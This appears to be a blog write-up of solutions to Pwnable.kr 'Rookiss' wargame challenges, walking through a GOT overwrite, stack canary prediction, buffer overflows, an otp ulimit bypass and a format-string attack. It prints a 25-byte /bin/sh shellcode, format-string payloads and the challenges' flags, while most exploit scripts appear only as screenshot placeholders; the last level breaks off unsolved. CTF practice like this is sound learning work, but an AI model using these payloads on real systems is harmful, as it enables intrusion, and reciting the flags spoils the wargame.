Pwnable.kr – Rookiss Write-Up

What follows is a write-up of a system exploitation war game, Pwnable.kr’s Rookiss.

The war game has players try to compromise different servers, websites, devices, and applications.  The players get a flag if they succeed in compromising the system.

Showing gratitude to the creators of the war game, I will abide by their rules and only publish the solution to those challenges that already have other solutions online. I will not post solutions to challenges that no one else has solved publicly.

[*] Status: IN-PROGRESS

Level 0: brain fuck

Instructions

I made a simple brain-fuck language emulation program written in C.
The [ ] commands are not implemented yet. However the rest functionality seems working fine.
Find a bug and exploit it to get a shell.

Download : http://pwnable.kr/bin/bf
Download : http://pwnable.kr/bin/bf_libc.so

Running at : nc pwnable.kr 9001

Solution

Open bf in Binary Ninja and go to the do_brainfuck function

screenshot

Notice the different cases, these are in hex, so display the cases in character constants.
What we get is:

‘>’ == p++
‘<‘ == p–
‘+’ == *p += 1
‘-‘ == *p -= 1
‘.’ == putchar(*p)
‘,’ == *p == getchar()
‘[‘ == puts(…)

screenshot 2

We can control the pointer (p), read and write values.

Look at the linear disassembly.

We will modify the global offset table (got.plt) to call system
Since we have the .libc file, we can calculate system’s address

Important addresses in .bss and .got.plt:
0x0804A0A0     tape
0x804a010     fgets
0x804a02c     memset
0x08048671     main

screenshot 3

This is how we will overwrite GOT:
First, we modify memset to call fgets
Then, we modify fgets to call system
Finally, we modify putchar to re-enter main

Writing a Python script to carry out the exploit:
vi bf_GOT_overwrite.pyscreenshot 5screenshot 6

Getting the flag:
python bf_GOT_overwrite.py

screenshot 4

Flag: BrainFuck? what a weird language..

 

Level 1: md5 calculator

Instructions

We made a simple MD5 calculator as a network service.
Find a bug and exploit it to get a shell.

Download : http://pwnable.kr/bin/hash
hint : this service shares the same machine with pwnable.kr web service

Running at : nc pwnable.kr 9002

Solution

Check for canaries.
gdb -q ./hash
checksec

screenshot.png

Notice that there is canary protection.

Open “hash” in Binary Ninja and examine the main function.

screenshot 2screenshot 3

The program first calls my_hash. Then, it lets us input a base64-encoded string.

Examine the “process_hash” function and change the numbers from hex to decimal (Display As -> Signed Decimal).

screenshot 4

Notice that the input size is of 1024 before base64-decoding.
The program then decodes the string and computes an MD5 value for the base64-decoded string.

Examine the “calc_md5” function and change the numbers from hex to decimal.

screenshot 5

Notice that the buffer size after decoding is 512. This leads to the possibility of a buffer overflow.

Going back to main, notice that the seed of randomization utilized for the canary generation is the current time.

screenshot 6

Examine the “my_hash” function.

screenshot 7

Armed with the knowledge of the seed of randomization (current time), we can use “my_hash” to calculate the canary value.

screenshot 8

Look at the linear disassembly to get the addresses for System and g_buf.
system     = 0x08048880
g_buf     = 0x804B0E0

Writing our Python script to own this challenge:

screenshot 9
Uploading our exploit scripts to the Pwnable server and running locally:
ssh uaf@pwnable.kr -p2222
cd /tmp

screenshot 10

Flag: Canary, Stack guard, Stack protector.. what is the correct expression?

 

Level 2: simple login

Instructions

Can you get authentication from this server?

Download : http://pwnable.kr/bin/login

Running at : nc pwnable.kr 9003

Solution

Open “login” in Binary Ninja and examine the main function in Linear Disassembly.

screenshot

screenshot 2

Notice that the maximum length of the base64-decoded string is 12 bytes.
Running the program and entering 12 characters, however, results in a segmentation fault.

screenshot 3

The apparent key is a simple buffer overflow.
We can send a base64-encoded payload to bypass the login check.

Determine the location of “input” and “/bin/sh”
Inspect the “correct” function.

screenshot 4

/bin/sh address: 0x8049284

Double-click on “input”.

screenshot 5

Input address: 0x811eb40

Craft a Python script to perform the attack:

screenshot 6

Run the Python script to get a shell.
python login.py

screenshot 7

Take the flag.
cat flag

screenshot 8

Flag: control EBP, control ESP, control EIP, control the world~

 

Level 3: otp

Instructions

I made a skeleton interface for one time password authentication system.
I guess there are no mistakes.
could you take a look at it?

hint : not a race condition. do not bruteforce.

ssh otp@pwnable.kr -p2222 (pw:guest)

Solution

Download the source code and the binary:
scp -P 2222 otp@pwnable.kr:/home/otp/otp ./
scp -P 2222 otp@pwnable.kr:/home/otp/otp.c ./

Read the source code.

screenshotscreenshot 2

Notice how the creation of files is linked to the authentication process.
Using a command such as “ulimit” to set resource limits, in this case file creation, would then ensure that the program comes up with a (valid) empty password.

Craft a Python script under the “tmp” directory to accomplish the bypass:

screenshot 3

Run the exploit:

screenshot 4

Flag: Darn… I always forget to check the return value of fclose() 😦

 

Level 5: tiny_easy

Instructions

I made a pretty difficult pwn task.
However I also made a dumb rookie mistake and made it too easy 😦
This is based on real event 🙂 enjoy.

ssh tiny_easy@pwnable.kr -p2222 (pw:guest)

Solution

Download the binary:
scp -P 2222 tiny_easy@pwnable.kr:/home/tiny_easy/tiny_easy ./

Check what we’re dealing with:
file tiny_easy

screenshot 2

Run checksec on the binary to check for protections:
gdb -q ./tiny_easy

screenshot

Apparently No-eXecute (NX) is enabled.

Running the file results in a segmentation fault.

screenshot 3

Open “tiny_easy” in Binary Ninja:

screenshot 4

This is all we get. The program is indeed tiny.

Since we can’t see any of the addresses, we can’t craft a traditional exploit. The only option left is to use environment variables and NOP sleds.

We will use my old reliable shellcode (25 bytes):
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

Crafting the exploit:
cd /tmp
vi spray_and_pray.py

screenshot 5

Executing the payload and grabbing the flag:
python spray_and_pray.py

screenshot 6

Flag: What a tiny task 🙂 good job!

 

Level 6: fsb

Instructions

Isn’t FSB almost obsolete in computer security?
Anyway, have fun with it 🙂

ssh fsb@pwnable.kr -p2222 (pw:guest)

Solution

Download the source code and the binary:
scp -P 2222 fsb@pwnable.kr:/home/fsb/fsb ./
scp -P 2222 fsb@pwnable.kr:/home/fsb/fsb.c ./

Read the source code:

screenshotscreenshot 2

We get a very generous hint. There is a format string bug.
Also notice that the “key” (pw) input, or the fifth input, has the unsigned long long pw compared against the unsigned long long key.

Running the binary:

screenshot 4

Notice a counter on the 11th argument.

Analyzing the binary:

screenshot 5

screenshot 3

Notice that the address of key is 0x804a060.

Let us also go back to running the program.

Using format_converter.py:

screenshot 6

Key address: 134520928

Exploring the format string bug:
./fsb
%14$n
%p

screenshot 8

screenshot 9

We can write key’s address using the 14th argument. I learned this through trial and error. Enter %11$n, for example, and see how you get a segmentation fault.

We know how to write to key’s address. Now we need to write to the address, to set the value of key ourselves.

Exploit:
%134520928d%14$n
%20$n
%134520932d%14$n
%20$n

screenshot 10

What is happening:
%134520928d%14$n == Write to key’s address, via the 14th argument
%20$n == Write zero (0) to the key address, as the key value

Since the key is of type unsigned long long (8 bytes), this means we must overwrite the next four bytes as well, at address 0x804a064.

Entering 0 at the key prompt will grant us a shell, since that is what we overwrote the key value with.

Format String Reference:

Pwning the service:
./fsb

First prompt:
%134520928d%14$n
%20$n
%134520932d%14$n
%20$n
Second prompt:
0
Key prompt:
0

screenshot 7

Flag: Have you ever saw an example of utilizing [n] format character?? 😦

 

Level 7: dragon

Instructions

I made a RPG game for my little brother.
But to trick him, I made it impossible to win.
I hope he doesn’t get too angry with me :P!

Author : rookiss
Download : http://pwnable.kr/bin/dragon

Running at : nc pwnable.kr 9004

 

Solution

 

Advertisements

One thought on “Pwnable.kr – Rookiss Write-Up”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s